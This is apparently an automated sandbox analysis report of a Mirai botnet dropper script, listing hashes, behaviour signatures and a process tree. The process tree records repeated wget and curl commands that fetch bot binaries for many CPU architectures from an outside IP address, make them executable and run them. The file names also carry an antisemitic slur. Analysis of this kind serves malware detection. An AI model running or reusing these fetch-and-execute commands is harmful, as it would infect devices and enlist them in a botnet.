Analysis

  • max time kernel
    135s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240729-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    07/12/2024, 04:11

General

  • Target

    jewn.sh

  • Size

    1KB

  • MD5

    720a5e4e44f99b055d00bf5be3948b2d

  • SHA1

    684fa717c79344199982029892b768a335682f57

  • SHA256

    c5529040db9e0e5cbe26dac8162859d8867ae845a6b2fdfdcad8ee2cfe63ff1d

  • SHA512

    c9b4f2f2e6f9e0c66421ae95641f013e7be7652e9b4787cc84cab88e24fe18e471b77249de3c210fe410e16312dbef499b5e81b8d03ffb4ad1796f5dc1a04b1a

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (96092) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 14 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 7 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 14 IoCs
  • Changes its process name 7 IoCs
  • Reads system network configuration 1 TTPs 7 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jewn.sh
    /tmp/jewn.sh
    1⤵
    • Writes file to tmp directory
    PID:709
    • /usr/bin/wget
      wget http://104.234.240.71/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:716
    • /usr/bin/curl
      curl -O http://104.234.240.71/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:733
    • /bin/cat
      cat jew.x86
      2⤵
        PID:738
      • /bin/chmod
        chmod +x jewn jewn.sh jew.x86 systemd-private-51a201d8a5564807b8e716d64963d5ef-systemd-timedated.service-JYTpM2
        2⤵
        • File and Directory Permissions Modification
        PID:739
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:740
      • /usr/bin/wget
        wget http://104.234.240.71/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:742
      • /usr/bin/curl
        curl -O http://104.234.240.71/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:743
      • /bin/cat
        cat jew.mips
        2⤵
        • System Network Configuration Discovery
        PID:789
      • /bin/chmod
        chmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-51a201d8a5564807b8e716d64963d5ef-systemd-timedated.service-JYTpM2
        2⤵
        • File and Directory Permissions Modification
        PID:790
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:791
      • /usr/bin/wget
        wget http://104.234.240.71/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:793
      • /usr/bin/curl
        curl -O http://104.234.240.71/bins/jew.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:818
      • /bin/cat
        cat jew.mpsl
        2⤵
          PID:825
        • /bin/chmod
          chmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-51a201d8a5564807b8e716d64963d5ef-systemd-timedated.service-JYTpM2
          2⤵
          • File and Directory Permissions Modification
          PID:826
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Changes its process name
          PID:827
        • /usr/bin/wget
          wget http://104.234.240.71/bins/jew.arm4
          2⤵
            PID:831
          • /usr/bin/curl
            curl -O http://104.234.240.71/bins/jew.arm4
            2⤵
            • Writes file to tmp directory
            PID:833
          • /bin/chmod
            chmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-51a201d8a5564807b8e716d64963d5ef-systemd-timedated.service-JYTpM2
            2⤵
            • File and Directory Permissions Modification
            PID:835
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:836
          • /usr/bin/wget
            wget http://104.234.240.71/bins/jew.arm5
            2⤵
            • Writes file to tmp directory
            PID:842
          • /usr/bin/curl
            curl -O http://104.234.240.71/bins/jew.arm5
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:845
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:847
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:848
          • /usr/bin/wget
            wget http://104.234.240.71/bins/jew.arm6
            2⤵
            • Writes file to tmp directory
            PID:851
          • /usr/bin/curl
            curl -O http://104.234.240.71/bins/jew.arm6
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:854
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:856
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:857
          • /usr/bin/wget
            wget http://104.234.240.71/bins/jew.arm7
            2⤵
            • Writes file to tmp directory
            PID:860
          • /usr/bin/curl
            curl -O http://104.234.240.71/bins/jew.arm7
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:863
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:865
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:866
          • /usr/bin/wget
            wget http://104.234.240.71/bins/jew.ppc
            2⤵
            • Writes file to tmp directory
            PID:871
          • /usr/bin/curl
            curl -O http://104.234.240.71/bins/jew.ppc
            2⤵
            • Writes file to tmp directory
            PID:872
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:874
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:875
          • /usr/bin/wget
            wget http://104.234.240.71/bins/jew.m68k
            2⤵
            • Writes file to tmp directory
            PID:878
          • /usr/bin/curl
            curl -O http://104.234.240.71/bins/jew.m68k
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:881
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:883
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:884
          • /usr/bin/wget
            wget http://104.234.240.71/bins/jew.sh4
            2⤵
            • Writes file to tmp directory
            PID:887
          • /usr/bin/curl
            curl -O http://104.234.240.71/bins/jew.sh4
            2⤵
            • Writes file to tmp directory
            PID:890
          • /bin/chmod
            chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.sh4 jew.x86
            2⤵
            • File and Directory Permissions Modification
            PID:892
          • /tmp/jewn
            ./jewn
            2⤵
            • Executes dropped EXE
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:893

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/jewn

          Filesize

          60KB

          MD5

          c790dde9d4762b3e82c0d9e41df91fb9

          SHA1

          341070d0148f795a2b6dd1d988e497f4084bebe7

          SHA256

          e8ca93ec9f737481e131b64981ebf0212958dd1b43ef36a944869ae0f603e6f1

          SHA512

          ffa49eae4d60f3ff6f1b0fe053c5f8293e6eca3737d2805e464336376ca6f705da949936530c595bc33b4c49b7a80d8672f03414f027421394436b26c471697f

        • /tmp/jewn

          Filesize

          125KB

          MD5

          e20014e57c7c30bb2bda9aa339fc4aff

          SHA1

          a49e3de31275f2f55351494da979e4f9c7e97f3c

          SHA256

          c7b2789a6ad425fc8bc48a6b496a2e2d8951ea80a1c908fc7914e99a11674150

          SHA512

          b6db6b572bed7f1bfc9986a3157f8bb8e07ac31b19df39e7b2182c5d432b87a4165584801d0d3a320e93c8bb1b3cd582fcdff4531af2df75523207444673f2df

        • /tmp/jewn

          Filesize

          118KB

          MD5

          e763ac9455273a0ebd7773d550965150

          SHA1

          0b454e4cd734b07ee063c863fe44835653338f35

          SHA256

          4e566bbc9fba17867653b24298e8258311d7ac6f089b28029886e75ed6985594

          SHA512

          7e545ca2faf134e6a5841060791d9bd0a8bffcb3a1d1c056f6b62ac7ad0fb87aff3781ca628e4678fd7d55040d31b186c572270a5509efd9f081e44702c878b1